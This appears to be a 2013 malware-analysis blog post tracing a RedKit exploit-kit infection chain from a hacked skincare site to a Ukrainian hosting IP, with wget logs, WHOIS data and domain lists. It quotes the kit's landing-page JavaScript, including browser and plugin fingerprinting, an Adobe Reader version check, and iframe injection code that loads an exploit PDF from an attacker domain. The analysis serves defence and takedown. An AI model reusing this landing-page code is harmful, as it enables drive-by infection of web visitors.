#Howto - Analysis infection of RedKit sourced at 91.206.200.199 via OS X/Mountain Lion
15 Apr 2013 It's been a while since I post report in this blog. Now we are posting a RedKit infection we traced sourced to the Ukrainian hosting server at 91.206.200.199. The report is pointing us to the suspicion of an IP which is used by RedKit for source infection, suspected payload's server is there in some used dommains by bad actors.The difference between my previous analysis and this one is, this was purely analyzed & wrote from a "weaponized" OS X with my bunch of FreeBSD tools recompiled on it.
I hope this writing can be used as a how-to to my friends who used OSX same environment too. So for Mac users, specially for you who are familiar with UNIX/Linux command lines, don't be hurry to switch into other "X" OS for analysis, in my test-drive in writing this post, it proofed that OS X is more than enough to do a deep analysis of any threat.
OK, here we go!
It all begins with the infected site as per below url:
During the access to the site I recorded the below connection with the X11's based Wireshark:
If we follow the package within one http response well, it will show the request for infection below:
We saw 4 or 5 redirection in a row in accessing the infector site above. So I grabbed the "anti-aging-c-35.html?p___= to see the redirected IFRAME code was there, as per below snipped of TextMate:
Why a single html can caused the 4 or 5 redirection? Must be more.. I searched the components included to view this site as per below search tools:
Then I opened my firefox, faking the request to fool the RedKit script and to get the other files used as components to this html, then found the same IFRAME method was injected as per searched in my F*bug:
In details, I went to those script contains the iframe to confirm as per below row of snapshots:
Seeing these I realized that this site is (STILL) completely being used to infect.
I further checked whether the infector site's domain is legit or not:
Registered through: GoDaddy.com, LLC (http://www.godaddy.com)Well.. it's ending up to a legit hacked site..in GoDaddy(s Network..
Domain Name: TEVASKINCARE.COM
Created on: 01-Mar-10
Expires on: 25-Jul-13
Last Updated on: 26-Jul-12
Registrant:
Teva Skin Science LLC
117 Lost Forest Drive
Westminster, SC 29693
United States
NetRange: 173.201.0.0 - 173.201.255.255To my curiosity I studied the condition needed to grab this file by below HTTP header requests logged:
CIDR: 173.201.0.0/16
OriginAS: AS26496
NetName: GO-DADDY-COM-LLC
-2013-04-14 18:06:15-- h00p://www.tevaskincare.com/anti-aging-c-35.html?p___=I turned to see the redirectred infector, also checked it with browser to find request & response result as per below..
Resolving www.tevaskincare.com... 173.201.140.74
Caching www.tevaskincare.com => 173.201.140.74
Connecting to www.tevaskincare.com|173.201.140.74|:80... connected.
:
GET /anti-aging-c-35.html?p___= HTTP/1.1
Referer: Whatever that has google in it..
User-Agent: MalwareMustDie was banging your site to check RedKit infector..
Host: www.tevaskincare.com
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Date: Sun, 14 Apr 2013 09:06:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
Vary: Accept-Encoding
Set-Cookie: osCsid=svle39em7ni3oj6982rjaossm2; path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
:
200 OK
Length: unspecified [text/html]
Saving to: ‘anti-aging-c-35.html?p___=’
2013-04-14 18:06:20 (495 KB/s) - ‘anti-aging-c-35.html?p___=’ saved [6403]
Not trusting so much on GUI result? Me too. So I reproduced the access:
--2013-04-14 18:11:03-- h00p://r-yonemura.jp/eagn.html?i=830988Yes the "switch" of the infector is turned "off" at the moment the log was taken.. to bad..
Resolving r-yonemura.jp... 211.13.204.46
Caching r-yonemura.jp => 211.13.204.46
Connecting to r-yonemura.jp|211.13.204.46|:80... connected.
:
GET /eagn.html?i=830988 HTTP/1.1
Referer: h00p://www.tevaskincare.com/anti-aging-c-35.html?p___=
User-Agent: Beware malware.. MalwareMustDie is getting closer.. with new toyz..
Host: r-yonemura.jp
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Date: Sun, 14 Apr 2013 09:11:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html
200 OK
Length: 0 [text/html]
Saving to: ‘eagn.html?i=830988’
2013-04-14 18:11:07 (0.00 B/s) - ‘eagn.html?i=830988’ saved [0/0]
So always remember rule number one which is never doing too much "HTTP-banging" in dealing with RedKit infectors :-)
Anyhow, let's study the site used for second infector:
[Domain Name] R-YONEMURA.JPhmm, japanese legit domain, a SOHO legit business, in a hosting too,,
[Name Server] ns.namedserver.net
[Name Server] ns2.namedserver.net
[登録年月日] 2009/12/03
[有効期限] 2013/12/31
[状態] Active
[最終更新] 2013/01/01 01:05:09 (JST)
[名前] 株式会社リンクアップ
[Name] link up inc
inetnum: 211.13.200.0 - 211.13.204.255.. and good! Is under our jurisdiction to cleanup.
netname: ISLE-NET
descr: Isle,inc.
country: JP
admin-c: MA117JP
Fortunately, is the infector that I always keep an eye with, I always logged the "good response" as documentation which contained the Landing page that can be used as PoC as per pasted here -->>[HERE]
Now let's see the suspicious data in that landing page.. hope to see the interesting url for exploit infector or maybe a payload?
A Snip of Exploit Kit Landing Page
The plugin detect used...
var Ganni = {we have a heavily customized old version of PluginDetect :-)
version: "0.7.7",
rDate: "04/11/2012",
name: "Ganni",
handler: function (c, b, a) {
return function () {
c(b, a)
}
As per it is, the OS detection..
c.OS = 100;The condition for BSD OS are always empty anyway :-) Maybe next time I should test OpenBSD for accessing this?
if (b) {
var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1,
"iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2,
"Pocket\s*PC", 22.3, "", 100
];
for (f = d.length - 2; f >= 0; f = f - 2) {
if (d[f] && new RegExp(d[f], "i").test(b)) {
c.OS = d[f + 1];
break [...]
Interesting flag of "status" to be pointed after after detecting java
if (c.isIE && !c.ActiveXEnabled && d !== "java") {As per with Adobe reader, below is the initialization for infection with Pdf-Ctrl function..
a.status = -2;
return a
}
a.status = 1; [...]
Plugins: {..with the handling after flag of version detected...
adobereader: {
mimeType: "application/pdf",
navPluginObj: null,
progID: ["AcroPDF.PDF", "PDF.PdfCtrl"],
classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
INSTALLED: {}, [...]
flopp = Ganni.getVersion("AdobeReader");This is the part on how the HTML file got injected with IFRAME:
if (flopp) {
flopp = flopp.split(',');
sp1 = false;
if (flopp[1] < 4 && 9 == flopp[0]) sp1 = true;
if (flopp[1] < 3 && flopp[0] == 8) sp1 = true;
if (sp1) {
bosfef.setAttribute("width", 31);
bosfef.setAttribute("height", 13);
insertHTML: function (g, b, h, a, l) {And the variable used for infection is at the beginning of the script:
var m, n = document,
k = this,
q, p = n.createElement("span"),
o, j, f = "<";
var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"];
var i = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
if (!k.isDefined(a)) {
a = ""
}
if (k.isString(g) && (/[^\s]/).test(g)) {
g = g.toLowerCase().replace(/\s/g, "");
q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
q += 'style="' + i + 'display:inline;" ';
for (o = 0; o < b.length; o = o + 2) {
if (/[^\s]/.test(b[o + 1])) {
q += b[o] + '="' + b[o + 1] + '" '
}
}
q += ">";
for (o = 0; o < h.length; o = o + 2) {
if (/[^\s]/.test(h[o + 1])) {
q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
}
}
q += a + f + "/" + g + ">"
} else {
q = a
} [...]
var bosfef = document.createElement("iframe");This is it, the usage the 897.pdf exploit to infect the malware.
function dettq() {
document.body.appendChild(bosfef);
bosfef.setAttribute(jsou, "h00p://marykay-duka.kharkov.ua/987.pdf");}
File's currently unavailable (smile), or tango moved faster?
GET /987.pdf HTTP/1.1I used both previous infector url referers to re-check and the results were the same. Well, at least we're sure now that there is no harmless site will have the script works as per described, it is good enough for the clean up purpose. So let'S invetigate further on the network & infection records.
Host: marykay-duka.kharkov.ua ( 91.206.200.199)
HTTP request sent, awaiting response...
:
HTTP/1.1 404 Not Found
Server: nginx/1.1.10
Date: Sun, 14 Apr 2013 13:12:13 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 205
Connection: keep-alive
:
404 Not Found
The requested URL /987.pdf was not found on this server
] done.
2013-04-14 22:12:15 ERROR 404: Not Found.
What's with 91.206.200.199 ?
This is the main course of this story actually. As we can see the marykay-duka.kharkov.ua is a domain served in the Ukrainian Hosting service. The IP officially own by this host w/reversed IP registered by:
"web17.ukraine.com.ua A 91.206.200.199"Which is a confirmed Hosting Service's IP address:
"inetnum: 91.206.200.0 - 91.206.201.255The thing is there are so many web infection ended up in this address:
netname: Hosting
descr: Delta-X LTD"
org: ORG-LA230-RIPE
country: UA
admin-c: RIV3-RIPE
tech-c: RIV3-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-by: DELTAXUA-MNT
organisation: ORG-LA230-RIPE
org-name: "DELTA-X" LTD
org-type: OTHER
"address: Ukriane, Kyiv
address: Bogdana Khmelnitskogo 16/22, r. 504/1
abuse-mailbox: abuse@delta-x.ua"
admin-c: RIV3-RIPE
person: Rudenko Ilya Vladimirovich
address: UA, Kyiv, 03065
address: PO Box 65
phone: +38(044)392-74-33
abuse-mailbox: abuse@delta-x.ua
"Some PoC of infections in this Hosting server's IP..One of the above infected url has a payload snapshot:
urlquery ALSO detected other action in some of the domains under this IP..."
url: http://urlquery.net/search.php?q=91.206.200.199&type=string&start=2013-01-14&end=2013-04-14&max=50
Date (CET) Alerts / IDS URL IP
2013-04-14 15:40:35 0 / 0 "h00p://marykay-duka.kharkov.ua" 91.206.200.199
2013-04-04 16:38:05 0 / 8 "h00p://www.2sen.ru/engine/download.php?id=55" 91.206.200.199
2013-04-04 15:59:02 0 / 8 "h00p://www.2sen.ru/engine/download.php?id=55" 91.206.200.199
"And so does Virus Total.."
url: https://www.virustotal.com/en/ip-address/91.206.200.199/information/
2/36 2013-04-11 11:23:26 "h00p://chevrole.org.ua/"
Thus, pDNS command line combined with domains checker script we posted in our Google Project can extract more domains used by malware infector & current ALIVE status:
"..while these are domains with via UKRAINE.COM.UA registrar -Well, this is a hosting server.. so it has many domains.. Sure it is.
with NS, a PoC of hosting (provided set of domains + DNS)"
490968298.com,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
overfuns.com,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
pro100soft.net,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA
ukrjudo.com,91.206.200.43,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA
zverdvd.org,91.206.200.43,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
pamparam.net,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
pr-plus.net,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
metal-forming.org,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
[...] etc [...]
"AND these domains are pointed to an IP address w/o proper NS sets.."
chevrole.org.ua,91.206.200.199,
forum.zverdvd.org,91.206.200.43,91.206.200.199,
funmobile.com.ua,91.206.200.199,
marykay-duka.kharkov.ua,91.206.200.199,
2sen.ru,91.206.200.199,91.206.200.199,
papercraft.su,91.206.200.210,
reshebniki.org.ua,91.206.200.43,91.206.200.199,
I didn't say that the 44 domains which are registered in this IP are verdicted bad, but some dangerous infector with the RedKit and etc Exploit Kit infector are found ending up to this IP.
( This is the list of active domains in 91.206.200.199 -->>[PASTEBIN] )
Furthermore the domain used for infection in our case is belong to below info:
domain: marykay-duka.kharkov.uaIf my deduction is correct, whether this hosting is also under hacking to be used for infection OR ...(Our Tango Team is investigating further now).
descr: Domain registered for customer of Ukraine.com.ua
admin-c: DELTA-EUNIC
tech-c: DELTA-EUNIC
nserver: ns1.ukraine.com.ua
nserver: ns2.ukraine.com.ua
nserver: ns3.ukraine.com.ua
mnt-by: DELTA-MNT-EUNIC
reg-by: DELTA-REG-EUNIC
changed: hostmaster@deltahosting.com.ua 20130308
source: EUNIC
Transfer: locked
Record created: 2011-03-11
Record last updated: 2013-03-08
Record registered: 2011-03-11
Record expires: 2014-03-11
Status: OK
The bottom line is, in the mean time please keep an eye on a suspicious access which lead to 91.206.200.199. And all of the network analysis was conducted via OSX Terminal :-)
References
The below numbers are link to the infection references that can be used for our infector dismantling (TangoDown) purpose:
#MalwareMustDie